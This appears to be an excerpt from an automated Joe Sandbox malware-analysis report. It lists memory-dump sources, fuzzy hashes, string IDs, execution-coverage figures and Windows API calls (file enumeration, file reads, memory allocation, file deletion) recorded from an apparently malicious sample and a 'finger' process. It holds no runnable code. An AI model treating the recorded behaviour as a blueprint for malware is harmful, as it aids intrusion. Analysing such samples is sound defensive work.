                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $e$k$o
                                                                                                                                            • API String ID: 0-3624523832
                                                                                                                                            • Opcode ID: a55068be979282d34dc83a415afb4bcd6c80d87a357ea934c1cfe71289a18ec6
                                                                                                                                            • Instruction ID: f3a0c1e1a66b8ccd28ca7810c09114e09a01d19f0400eb7ecd849d3ee24ca598
                                                                                                                                            • Opcode Fuzzy Hash: a55068be979282d34dc83a415afb4bcd6c80d87a357ea934c1cfe71289a18ec6
                                                                                                                                            • Instruction Fuzzy Hash: D5B1FCB5A00709AFDB24DFA4CC85FEFB7F9AF88704F108558F619A7240D675AA41CB60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $e$h$o
                                                                                                                                            • API String ID: 0-3662636641
                                                                                                                                            • Opcode ID: c7a519b6f85a77fafb681f7c5a40ae3fff37a7b8d62411df535c8e10e6363702
                                                                                                                                            • Instruction ID: 6476ca5a571f90850c113fccb56d89cffd8af4ad20221a840dbff264b77fd4c9
                                                                                                                                            • Opcode Fuzzy Hash: c7a519b6f85a77fafb681f7c5a40ae3fff37a7b8d62411df535c8e10e6363702
                                                                                                                                            • Instruction Fuzzy Hash: 5B8159B29102697EEB25EB94CD44FEF73BCAF48304F40869AE50966140EB747B44CFA1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $e$k$o
                                                                                                                                            • API String ID: 0-3624523832
                                                                                                                                            • Opcode ID: 364656f7f8e3204c8a290aa5219b21a4bcb19782370dcb4ed2621add598f005b
                                                                                                                                            • Instruction ID: 88943efb106a251fff31c316fdedb69e0d4fabe3e3c73b1cc8640097daee8f5b
                                                                                                                                            • Opcode Fuzzy Hash: 364656f7f8e3204c8a290aa5219b21a4bcb19782370dcb4ed2621add598f005b
                                                                                                                                            • Instruction Fuzzy Hash: 1661FAB5A00709AFDB24DFA5CC84FEFB7F9AB88704F108558E619A7244D771AA41CB60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                            • API String ID: 0-2877786613
                                                                                                                                            • Opcode ID: 77c5c0074d3053acb9403f361c11b75d78b2c28e39fc956f86384b03c66a7c79
                                                                                                                                            • Instruction ID: a6d7e8b2530daf71e25451c5db6a4496386d39043363b8717c191284fbd45f76
                                                                                                                                            • Opcode Fuzzy Hash: 77c5c0074d3053acb9403f361c11b75d78b2c28e39fc956f86384b03c66a7c79
                                                                                                                                            • Instruction Fuzzy Hash: 39416F71621569BEF701FB908D41FFF777CAF55A04F004549F600AA180E774AB0587AA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                            • API String ID: 0-2877786613
                                                                                                                                            • Opcode ID: 0e11e126845198db919dfa2b8679584f5a12564fa7d049ca3cddfbc08df67072
                                                                                                                                            • Instruction ID: a412525d38d1bd5f68612a996a644c8b871d1700ea197f110c11587169c99673
                                                                                                                                            • Opcode Fuzzy Hash: 0e11e126845198db919dfa2b8679584f5a12564fa7d049ca3cddfbc08df67072
                                                                                                                                            • Instruction Fuzzy Hash: 70315F71621569BEF701FB908D41FFF777CAF55604F004548FA04AA180E774BB0587AA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 1$3$9$Y
                                                                                                                                            • API String ID: 0-242293358
                                                                                                                                            • Opcode ID: 6e4d105d2c0138823abf775b7f13f890c50d1d686ce499a1aae2527a36c4b635
                                                                                                                                            • Instruction ID: 4754a6e04d5bb22162152197bf4a9968294d1388e93b5d95830563add99ca988
                                                                                                                                            • Opcode Fuzzy Hash: 6e4d105d2c0138823abf775b7f13f890c50d1d686ce499a1aae2527a36c4b635
                                                                                                                                            • Instruction Fuzzy Hash: 583134B1A10119BBFB04EF94DD41BFFB7F8EF44304F008159E904A6240EB75AA458BE5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $e$k$o
                                                                                                                                            • API String ID: 0-3624523832
                                                                                                                                            • Opcode ID: c66270da216cd17fc1db351ecbec12422130c897862b228a087fe367d305e036
                                                                                                                                            • Instruction ID: d20852f301465940d00f2b70045a1adcbe459493af65ef3d719e84630b807d55
                                                                                                                                            • Opcode Fuzzy Hash: c66270da216cd17fc1db351ecbec12422130c897862b228a087fe367d305e036
                                                                                                                                            • Instruction Fuzzy Hash: 610184B2900218ABDB14EF98D884ADEF7B9FF48314F048219E919AB205E771E545CBA0

Execution Graph

Execution Coverage: 2.6%
Dynamic/Decrypted Code Coverage: 4.1%
Signature Coverage: 2.2%
Total number of Nodes: 465
Total number of Limit Nodes: 75

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • String ID: !$!$$X$($,$.>$01$4$5\$8$8`$:$;?$<$=J$@$@=$B$D$E$FY$H$R$W$X$Z$]$] $_$b$b'$bJ$d$n[$wG$x^$yQ${$~$!$*$<$B$d
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F5CAC4
                                                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 02F5CAFF
                                                                                                                                            • FindClose.KERNELBASE(?), ref: 02F5CB0A
                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                            APIs
                                                                                                                                            • NtCreateFile.NTDLL(?,?,?,?,?,97C467A0,?,?,?,?,?), ref: 02F696EE
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            APIs
                                                                                                                                            • NtReadFile.NTDLL(?,?,?,?,?,97C467A0,?,?,?), ref: 02F69846
                                                                                                                                            • API ID: FileRead
                                                                                                                                            APIs
                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(02F5213E,?,02F683EF,00000000,00000004,97C467A0,?,?,?,?,?,02F683EF,02F5213E), ref: 02F69B28
                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                            APIs
                                                                                                                                            • API ID: DeleteFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                            APIs
                                                                                                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F69927
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: f3533fc2074e987707d8ef85f715f0eeca34bb1281d7388ab6cb480c4e3f21e2
                                                                                                                                            • Instruction ID: 982179a19824cb9e51ba47336862c5f395af53b258e893287e189c067273fa46
                                                                                                                                            • Opcode Fuzzy Hash: f3533fc2074e987707d8ef85f715f0eeca34bb1281d7388ab6cb480c4e3f21e2
                                                                                                                                            • Instruction Fuzzy Hash: A6900221211C0482D200B5685C14B07000987D0303F56C126A0154554CCA5A89615631
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 5592fee38fcb57fa5a78fcb49a94f574e3ceef92350d92973ee09bd8f72d5f09
                                                                                                                                            • Instruction ID: a90348718d19bc53c67d6aaca9e0332e8fe597024b4acae314d975798808576e
                                                                                                                                            • Opcode Fuzzy Hash: 5592fee38fcb57fa5a78fcb49a94f574e3ceef92350d92973ee09bd8f72d5f09
                                                                                                                                            • Instruction Fuzzy Hash: 6090026134140882D100B1585414B060009C7E1301F56C026E1064554D875ECD526236
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: c29377ae627a0526931b14e863d4d2618a4f7c6a293be68834f2e1b208bb3dc7
                                                                                                                                            • Instruction ID: 8d69a2b6b8b4f468476ec9962f532c6c3329b094b839ac90a92824c81db7127c
                                                                                                                                            • Opcode Fuzzy Hash: c29377ae627a0526931b14e863d4d2618a4f7c6a293be68834f2e1b208bb3dc7
                                                                                                                                            • Instruction Fuzzy Hash: CC90022160140942D101B1585404616000E87D0241F96C033A1024555ECB6A8A92A231
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 8531f9f18a8acaef98e7da704b45edf9d005f055e14b973c130ace17c80bd9da
                                                                                                                                            • Instruction ID: 911627ef2c71130dd3b4c3116e19f18a454f82d4a97a54e69592b6166fe21930
                                                                                                                                            • Opcode Fuzzy Hash: 8531f9f18a8acaef98e7da704b45edf9d005f055e14b973c130ace17c80bd9da
                                                                                                                                            • Instruction Fuzzy Hash: 2690026120180843D140B5585804607000987D0302F56C022A2064555E8B6E8D516235
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 4c80f20a755a0d4715f283cbf5a27d563cc0698b7ac000a74dc6e302f156e82a
                                                                                                                                            • Instruction ID: 0ab461ff76262f8a773eeca5f719cdca4a486d577d645a7395944a09155c0270
                                                                                                                                            • Opcode Fuzzy Hash: 4c80f20a755a0d4715f283cbf5a27d563cc0698b7ac000a74dc6e302f156e82a
                                                                                                                                            • Instruction Fuzzy Hash: 8690023120140853D111B1585504707000D87D0241F96C423A0424558D979B8A52A231
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: e2772b5a5b346d5946aeb94c02f3e312d029fb044a36af708a0ccbe63652a041
                                                                                                                                            • Instruction ID: 30a7953483c9ad8dbf6986af496f42a81d1e92e9d2ec00349c8141bb10458d5c
                                                                                                                                            • Opcode Fuzzy Hash: e2772b5a5b346d5946aeb94c02f3e312d029fb044a36af708a0ccbe63652a041
                                                                                                                                            • Instruction Fuzzy Hash: 6A900221242445925545F1585404507400A97E0241796C023A1414950C866B9956D731
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 5ade96c9e76a974ebfc1b07b7516f2850e162fc44762a73ca22306683651d591
                                                                                                                                            • Instruction ID: e217091e4798eb4c314c86b274b8df117f29879d454ed6a0abe09b5f42369a8c
                                                                                                                                            • Opcode Fuzzy Hash: 5ade96c9e76a974ebfc1b07b7516f2850e162fc44762a73ca22306683651d591
                                                                                                                                            • Instruction Fuzzy Hash: C790022130140443D140B15864186064009D7E1301F56D022E0414554CDA5A89565332
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 7549c6d75ae560dddd3ba0ccd6d551cf2c6945bb3239afd2d5d32058a763ea9f
                                                                                                                                            • Instruction ID: 003e5cb2fcc31de4a79020ae0c08b0b383cfe68861e09177970f936bb558728c
                                                                                                                                            • Opcode Fuzzy Hash: 7549c6d75ae560dddd3ba0ccd6d551cf2c6945bb3239afd2d5d32058a763ea9f
                                                                                                                                            • Instruction Fuzzy Hash: 8B90022921340442D180B158640860A000987D1202F96D426A0015558CCA5A89695331
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 71bf4ca35f43be0c81141fbc72e12bc737d93ce3ff172adbdb59d6608eeeb6b7
                                                                                                                                            • Instruction ID: be70d8e54c2d3814a662360860a8bb7053c6d1ba22305ee8df22334d41752c8b
                                                                                                                                            • Opcode Fuzzy Hash: 71bf4ca35f43be0c81141fbc72e12bc737d93ce3ff172adbdb59d6608eeeb6b7
                                                                                                                                            • Instruction Fuzzy Hash: 5390023120140842D100B5986408646000987E0301F56D022A5024555EC7AA89916231
APIs
Memory Dump Source
• Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
• Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
